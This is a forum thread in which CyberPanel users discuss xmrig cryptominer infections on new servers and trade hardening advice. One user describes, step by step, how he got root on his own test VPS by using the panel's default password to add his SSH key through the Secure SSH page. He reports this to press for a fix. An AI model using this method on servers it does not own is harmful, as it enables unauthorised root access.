Infected with xmRIG virus

The free version of OPenLiteSpeed was selected for installation

I had a server with only CyberPanel installed and somehow got xmRig Trojan two days later

Are there any friends who have similar experiences with me, I wonder why

I’ve tested it on multiple servers and it’s infected, so I suspect it’s a bug in CyberPanel

What should I do now

Just install new panel use only ssh keys to authenticate and disable root login.
Your server is hacked or there is something really wrong cyberpanel security.

I suspect a security issue with the panel, as I tested this virus on multiple servers

I just checked all my servers and none have that.
How you login on ssh use password or key? Can your computer be infected?

I’m using Xshell 7 and logging in as root

Is it legit Xshell 7 or cracked? Sounds weird that multiple server get xmrig on root. You should check your computer not have any malware.

The free version of Xshell 7 is available from the official website

I checked my Win11 system, no malicious programs

Try install fresh server with ssh keys, disable password login and root login. Use official install script, not any ready image or marketplace.

Everyone must upgrade their CyberPanel installations and if you are not technical enough then upgrade your CyberPanel move out to fresh CyberPanel installation.

As recently there is a security release: Change Logs

I am using the official website installation command, should be the latest version

I deployed two VPS servers with Ubuntu 20.04 from Vultr yesterday to test something out quickly. I installed CyberPanel and nothing else. Today both of them are infected with xmrig. Surely the root password from Vultr is secure enough, so the main vulnerability path would be that I left CyberPanel’s admin password as default 1234567. I also didn’t configure any of the security settings, firewall etc…

Any thoughts on what might have happened?

I can’t investigate further, since I immediately deleted both servers. But if someone can give some instructions on what I should log, I’m happy to set up a new VPS with the same config and just leave it to get hacked again.

Just checked all my servers and not affected by this.

Maybe as @nick.chomey mentioned, could it be due to unsecured password for the admin user?

My main server is fine, though this motivated me to finally secure it further. I just did the following:

  1. Create another user and give it root privileges and set up to connect with my PubKey.
  2. In /etc/ssh/sshd_config, set PermitRootLogin and PasswordAuthentication to no

Though, now that I’ve done this and looked around a bit, what I’m guessing is that with a default CyberPanel pw, anyone could log into the server and add an ssh key at https://site.com:8090/firewall/secureSSH, which would presumably give them full root access without any passwords.

Am I missing something? If not, is this a feature that should even exist within the panel?

And should we even be permitted to install CyberPanel with the default password? I think it would be prudent to force users to either choose one or have a random one set by a command like openssl rand 60 | openssl base64 -A and then it is printed at the end of setup.

To test all of this, I’m currently deploying a new VPS where I will keep the default cyberpanel pw and i will try to add a publickey to it and then try to connect to the server like that without “knowing” the root password.

@usmannasir I just successfully hacked my new vps server in 10 seconds with the above method.

I installed CyberPanel with the default password 1234567, went to Security->Secure SSH and added the PubKey for my computer. Then from my ssh client I connected to the server with the IP, root username and my private key. Anyone could use their own key, so long as they have the cyberpanel password.

I think it is crucial to disable the default pw option, and make the default option random. If you want a dumb pw for some quick testing purposes, you should have to enter it manually and receive a warning about it.

I also see that the random is only 16 characters, from this mechanism head /dev/urandom | tr -dc A-Za-z0-9 | head -c 16

Shouldnt it be made considerably longer? There’s no real reason it couldn’t be 50+ characters.

Moreover, how is this even possible? Should the cyberpanel user even have root access such that it can add the public key for the root user’s home directory?

I will leave this vps up and running and wait for it to get hacked again. I’ll try to investigate when it does happen. Any suggestions for what to do and look for are welcomed.

Hi, Nick. I appreciate you taking those tests
I am a beginner of Linux, I only know that I am infected with XMRig virus, but I do not know how to remove it, after your testing, do you find the problem now
What can I do to make my server more secure

@wang I would suggest deploying a new server and moving your websites to it. Set a strong password for the cyberpanel admin account, create a new system user and give it sudo privileges, turn off root login access, set up an ssh private/public key for the new user, install CSF, and other things.

If this is all too complicated, I would recommend checking out CloudPages, RunCloud or GridPane. They all offer excellent and easy VPS server management for an affordable price.

Do you want to give root permission to the new user

How do I set the SSH private key or public key

How to install CSF

recommended manual installation

then try other provider… or install OS only… then scan it… if clean… do manual installation
if clean…then the problem is on your provider’s pre-installed img.

are you sure ?
better to test manual installation

me too
and multitimes destroy and reinstall

agree

what av do you use ?


btw… are you using nulled script or GPL CMS ???

It is quite obvious to not use 123456 as password. I wonder how come people are using the 123456 as password? Atleast change it to something personalized and stronger password. Its like setting your bank password as 123456 and expect not to get hacked/robbed.

1 Like

HOW THE XMRIG TROJAN VIRUS SNEAKS ONTO YOUR COMPUTER SYSTEM - Orenda Security